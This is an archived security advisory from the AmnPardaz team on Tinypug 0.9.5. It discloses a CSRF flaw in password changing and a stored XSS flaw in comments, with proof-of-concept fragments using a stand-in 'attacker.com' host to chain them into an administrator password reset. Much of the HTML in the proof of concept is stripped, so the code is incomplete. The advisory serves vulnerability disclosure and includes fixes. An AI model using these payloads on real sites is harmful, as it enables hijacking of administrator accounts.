TUCoPS :: HP Unsorted T

##########################www.BugReport.ir######################################## # # AmnPardaz Security Research Team # # Title:=09=09Tinypug Multiple Vulnerabilities # Vendor:=09=09http://platformassociates.com/ # (project hosted at http://code.google.com/p/tinypug/) # Vulnerable Version:=090.9.5 (and prior versions) # Exploitation:=09=09Remote with browser # Fix:=09=09=09N/A ################################################################################### #################### - Description: #################### Tinypug is a system for building portals that enable innovation communities and customer inquiry. The idea is to go beyond one-off statistical surveys (which tend to only verify an existing paradigm) to foster real collaboration, scalable two-way communication, and anecdotal feedback from users/customers. #################### - Vulnerability: #################### +--> CSRF (Cross-Site Request Forgery) =09The password changing page is vulnerable to CSRF attack. This vulnerability =09can be used to change the password of the victim. For details of this =09process see "Exploits/PoCs" section. +--> Stored XSS Vulnerability =09The comment page is vulnerable to Stored XSS attack. But comments will be published =09only after administrator confirmation. However this XSS vulnerablity can be =09used in conjunction with the more serious security whole (CSRF) in order to change =09administrator's password. #################### - Exploits/PoCs: #################### +--> Exploiting The CSRF Vulnerability: =09As any CSRF attack, you need victim to be logged in at target site, namely "victim.com", =09and visits the attacker's site, namely "attacker.com". =09Then attacker can change password of the victim (for example to "the-new-password") =09by presenting following code at attacker.com site: =09 =09=09 =09=09=09This frame is invisible!! =09=09 =09=09action="http://victim.com/tinypug-0.9.5/profiles/change_password" =09=09=09=09method="post" id="the_form" style="display:none" target="if1"> =09=09=09 =09=09=09 =09=09=09 =09=09 =09=09 =09 +--> Exploiting The Stored XSS Vulnerability: =09Simply go to the comment page of a post =09(for example at "http://victim.com/tinypug-0.9.5/stories/view/welcome#comments") =09and embed any desired XSS vector like =09But be aware that comments will be reviewed by administrators before publishing. +--> Changing Administrator Password by combining above Vulnerabilities: =09Using the Stored XSS attack, make administrator to see following code: =09My comment !!! src="http://attacker.com/csrf.php"</a> style="display:none" /> =09Then whether he/she approve your comment or not :) his/her password will be changed =09to "the-new-password" via CSRF attack by visiting implicitly =09the <a href="http://attacker.com/csrf.php">"http://attacker.com/csrf.php"</a> URI. #################### - Original Advisory: #################### <a href="http://www.bugreport.ir/index_67.htm">http://www.bugreport.ir/index_67.htm</a> #################### - Solution: #################### For CSRF vulnerability password changing page must be changed in order to ask for the old password, too. For XSS vulnerability you could include all of the comments in the approval page by <xmp> tag. #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir <a href="http://www.BugReport.ir">www.BugReport.ir</a> <a href="http://www.AmnPardaz.com">www.AmnPardaz.com</a> </pre></tt></body></html>  <center> </center> <center><a href="/firefox.htm">TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).</a></center> <center>Site design & layout copyright © 1986-2024 AOH </center> <center><IMG SRC="http://artofhacking.com/cgi-bin/sc/sc.cgi?acct=tucops&font=payphone-med"></center> </body> </html>